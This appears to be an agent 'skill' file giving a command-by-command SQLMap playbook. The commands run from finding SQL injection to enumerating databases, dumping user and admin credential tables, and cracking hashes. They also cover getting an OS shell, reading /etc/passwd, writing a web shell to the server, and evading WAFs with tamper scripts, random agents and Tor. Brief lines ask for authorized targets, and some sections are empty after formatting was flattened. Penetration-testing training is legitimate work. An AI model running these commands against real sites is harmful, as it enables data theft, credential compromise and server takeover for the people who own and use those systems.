SQLMap Database Penetration Testing
This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.
name:SQLMap Database Penetration Testingdescription:This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.metadata:author:zebbernversion:"1.1"
SQLMap Database Penetration Testing
Purpose
Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.
Inputs / Prerequisites
?id=1)Outputs / Deliverables
Core Workflow
1. Identify SQL Injection Vulnerability
Manual Verification
# Add single quote to break query
http://target.com/page.php?id=1'If error message appears, likely SQL injectable
Error example: "You have an error in your SQL syntax"
Initial SQLMap Scan
# Basic vulnerability detection
sqlmap -u "http://target.com/page.php?id=1" --batchWith verbosity for detailed output
sqlmap -u "http://target.com/page.php?id=1" --batch -v 32. Enumerate Databases
List All Databases
sqlmap -u "http://target.com/page.php?id=1" --dbs --batchKey Options:
-u: Target URL with injectable parameter--dbs: Enumerate database names--batch: Use default answers (non-interactive mode)3. Enumerate Tables
List Tables in Specific Database
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batchKey Options:
-D: Specify target database name--tables: Enumerate table names4. Enumerate Columns
List Columns in Specific Table
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batchKey Options:
-T: Specify target table name--columns: Enumerate column names5. Extract Data
Dump Specific Table Data
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batchDump Specific Columns
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batchDump Entire Database
sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batchKey Options:
--dump: Extract all data from specified table--dump-all: Extract all data from all tables-C: Specify column names to extract6. Advanced Target Options
Target from HTTP Request File
# Save Burp Suite request to file, then:
sqlmap -r /path/to/request.txt --dbs --batchTarget from Log File
# Feed log file with multiple requests
sqlmap -l /path/to/logfile --dbs --batchTarget Multiple URLs (Bulk File)
# Create file with URLs, one per line:
http://target1.com/page.php?id=1
http://target2.com/page.php?id=2
sqlmap -m /path/to/bulkfile.txt --dbs --batchTarget via Google Dorks (Use with Caution)
# Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)
sqlmap -g "inurl:?id= site:yourdomain.com" --batchQuick Reference Commands
Database Enumeration Progression
| Stage | Command |
|---|---|
| List Databases | sqlmap -u "URL" --dbs --batch |
| List Tables | sqlmap -u "URL" -D dbname --tables --batch |
| List Columns | sqlmap -u "URL" -D dbname -T tablename --columns --batch |
| Dump Data | sqlmap -u "URL" -D dbname -T tablename --dump --batch |
| Dump All | sqlmap -u "URL" -D dbname --dump-all --batch |
Supported Database Management Systems
| DBMS | Support Level |
|---|---|
| MySQL | Full Support |
| PostgreSQL | Full Support |
| Microsoft SQL Server | Full Support |
| Oracle | Full Support |
| Microsoft Access | Full Support |
| IBM DB2 | Full Support |
| SQLite | Full Support |
| Firebird | Full Support |
| Sybase | Full Support |
| SAP MaxDB | Full Support |
| HSQLDB | Full Support |
| Informix | Full Support |
SQL Injection Techniques
| Technique | Description | Flag |
|---|---|---|
| Boolean-based blind | Infers data from true/false responses | --technique=B |
| Time-based blind | Uses time delays to infer data | --technique=T |
| Error-based | Extracts data from error messages | --technique=E |
| UNION query-based | Uses UNION to append results | --technique=U |
| Stacked queries | Executes multiple statements | --technique=S |
| Out-of-band | Uses DNS or HTTP for exfiltration | --technique=Q |
Essential Options
| Option | Description |
|---|---|
-u | Target URL |
-r | Load HTTP request from file |
-l | Parse targets from Burp/WebScarab log |
-m | Bulk file with multiple targets |
-g | Google dork (use responsibly) |
--dbs | Enumerate databases |
--tables | Enumerate tables |
--columns | Enumerate columns |
--dump | Dump table data |
--dump-all | Dump all database data |
-D | Specify database |
-T | Specify table |
-C | Specify columns |
--batch | Non-interactive mode |
--random-agent | Use random User-Agent |
--level | Level of tests (1-5) |
--risk | Risk of tests (1-3) |
Constraints and Limitations
Operational Boundaries
Performance Considerations
--threads to speed up enumeration (default: 1)--start and --stop for large tables--technique to specify faster injection method if knownLegal Requirements
Detection Risk
--random-agent to vary User-Agent header--delay to avoid triggering rate limits--tor for anonymity (authorized tests only)Examples
Example 1: Complete Database Enumeration
# Step 1: Discover databases
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
Result: acuart database found
Step 2: List tables
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
Result: users, products, carts, etc.
Step 3: List columns
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
Result: username, password, email columns
Step 4: Dump user credentials
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batchExample 2: POST Request Injection
# Save Burp request to file (login.txt):
POST /login.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
username=admin&password=test
Run SQLMap with request file
sqlmap -r /root/Desktop/login.txt -p username --dbs --batchExample 3: Bulk Target Scanning
# Create bulkfile.txt:
echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt
echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txtScan all targets
sqlmap -m bulkfile.txt --dbs --batchExample 4: Aggressive Testing
# High level and risk for thorough testing
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3Specify all techniques
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQExample 5: Extract Specific Credentials
# Target specific columns
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp \
-T admin_users \
-C admin_name,admin_pass,admin_email \
--dump --batchAutomatically crack password hashes
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp \
-T users \
--dump --batch \
--passwordsExample 6: OS Shell Access (Advanced)
# Get interactive OS shell (requires DBA privileges)
sqlmap -u "http://target.com/page.php?id=1" --os-shell --batchExecute specific OS command
sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batchFile read from server
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batchFile upload to server
sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batchTroubleshooting
Issue: "Parameter does not seem injectable"
Cause: SQLMap cannot find injection point
Solution:
# Increase testing level and risk
sqlmap -u "URL" --dbs --batch --level=5 --risk=3Specify parameter explicitly
sqlmap -u "URL" -p "id" --dbs --batchTry different injection techniques
sqlmap -u "URL" --dbs --batch --technique=BTAdd prefix/suffix for filter bypass
sqlmap -u "URL" --dbs --batch --prefix="'" --suffix="-- -"Issue: Target Behind WAF/Firewall
Cause: Web Application Firewall blocking requests
Solution:
# Use tamper scripts
sqlmap -u "URL" --dbs --batch --tamper=space2commentList available tamper scripts
sqlmap --list-tampersCommon tamper combinations
sqlmap -u "URL" --dbs --batch --tamper=space2comment,between,randomcaseAdd delay between requests
sqlmap -u "URL" --dbs --batch --delay=2Use random User-Agent
sqlmap -u "URL" --dbs --batch --random-agentIssue: Connection Timeout
Cause: Network issues or slow target
Solution:
# Increase timeout
sqlmap -u "URL" --dbs --batch --timeout=60Reduce threads
sqlmap -u "URL" --dbs --batch --threads=1Add retries
sqlmap -u "URL" --dbs --batch --retries=5Issue: Time-Based Attacks Too Slow
Cause: Default time delay too conservative
Solution:
# Reduce time delay (risky, may cause false negatives)
sqlmap -u "URL" --dbs --batch --time-sec=3Use boolean-based instead if possible
sqlmap -u "URL" --dbs --batch --technique=BIssue: Cannot Dump Large Tables
Cause: Table has too many records
Solution:
# Limit number of records
sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100Dump specific columns only
sqlmap -u "URL" -D db -T table -C username,password --dump --batchExclude specific columns
sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbsIssue: Session Drops During Long Scan
Cause: Session timeout or connection reset
Solution:
# Save and resume session
sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_sessionResume from saved session
sqlmap -u "URL" --dbs --batch --resumeUse persistent HTTP connection
sqlmap -u "URL" --dbs --batch --keep-alive